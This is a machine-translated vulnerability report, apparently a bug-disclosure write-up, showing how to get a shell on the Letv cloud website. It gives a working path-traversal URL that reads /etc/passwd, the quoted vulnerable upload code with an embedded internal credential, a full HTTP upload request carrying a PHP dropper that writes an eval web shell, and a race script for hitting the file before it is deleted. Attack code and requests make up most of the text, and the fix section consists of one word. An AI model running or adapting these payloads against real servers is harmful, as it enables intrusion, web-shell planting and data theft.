Letv cloud main site getshell
The Leeco cloud main site can use getshell because of the design permission on the code.
Http://www.letvcloud.com/api/docdownload? Filename = .. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /etc/passwd can be downloaded from any file
Read this file www/Home/Lib/Action/VideoAction. class. php
Starting from line 1
} Else {// only supports jpeg upload $ max_file_size = 2000000; // The maximum size of the uploaded file is 2 MB. The unit is BYTEif ($ file ['type']! = 'Image/jpeg '& $ file ['type']! = 'Image/pjpeg ') {$ error_message = "<font color = 'red'> images can only be in jpg format! </Font> "; echo '<script> (function({{parent.doc ument. getElementById ("'. $ txtid. '"). innerHTML = "'. $ error_message. '";}) (); </script>'; exit;} if ($ max_file_size <$ file [" size "]) {$ error_message = "<font color = 'red'> the maximum file size should not exceed 2 MB! </Font> "; echo '<script> (function({{parent.doc ument. getElementById ("'. $ txtid. '"). innerHTML = "'. $ error_message. '";}) (); </script>'; exit ;}}$ dest_folder =" Public/img/"; if (! File_exists ($ dest_folder) {mkdir ($ dest_folder);} $ pinfo = pathinfo ($ file ['name']); $ newfilename = md5 (time ()). ". ". $ pinfo ['extension']; $ destination = $ dest_folder. $ newfilename; if (move_uploaded_file ($ filename, $ destination) {$ url =' http://upload.letvcdn.com:8000/single_upload_tool.php '; $ Data = array ("isphone" => "1", "username" => "isleju", "md5str" => "26f6c33c801913158424f7d3fbd6d0c3 ", "single_upload_submit" => "", "single_upload_file" => "@". realpath ($ destination), // change the file name to "single_upload_submit" => "OK"); $ urldatajson = uploadByCURL ($ data, $ url ); $ urldata = json_decode ($ urldatajson, true); unlink ($ destination );
Unlink the uploaded file. However, if you upload the file to another server in the middle, the time difference will be left.
Using this time difference, we can getshell
First package
POST /video/imgupload HTTP/1.1Host: www.letvcloud.comProxy-Connection: keep-aliveContent-Length: 450Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Origin: http://www.letvcloud.comUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryGFLdcAPyYpQq380JReferer: http://www.letvcloud.com/video/edit/videoid/8682339Accept-Encoding: gzip,deflateAccept-Language: zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4Cookie: LETVCLOUDID=705140aba5a3dc13e1222394352ade2b; Hm_lvt_984e73b4d6ff5ece34ec3da984ece290=1418609297; Hm_lpvt_984e73b4d6ff5ece34ec3da984ece290=1418631122------WebKitFormBoundaryGFLdcAPyYpQq380JContent-Disposition: form-data; name="txtid"load_message------WebKitFormBoundaryGFLdcAPyYpQq380JContent-Disposition: form-data; name="headImg"headImg------WebKitFormBoundaryGFLdcAPyYpQq380JContent-Disposition: form-data; name="upfile"; filename="test§1§.php"Content-Type: image/jpeg<?php fputs(fopen('f.php','w'),'<?php eval($_POST[f])?>');?>------WebKitFormBoundaryGFLdcAPyYpQq380J--
If you open 20 threads and keep sending packets, PHP files are continuously generated and uploaded to other servers.
Use the following script
<?php$url="http://www.letvcloud.com/Public/img/".md5(time()).".php";echo $url;file_get_contents($url);php?>
Open a higher thread to send packets
Before the file is deleted, php accessing the uploaded file will write a new php file, resulting in getshell
Solution:
Filter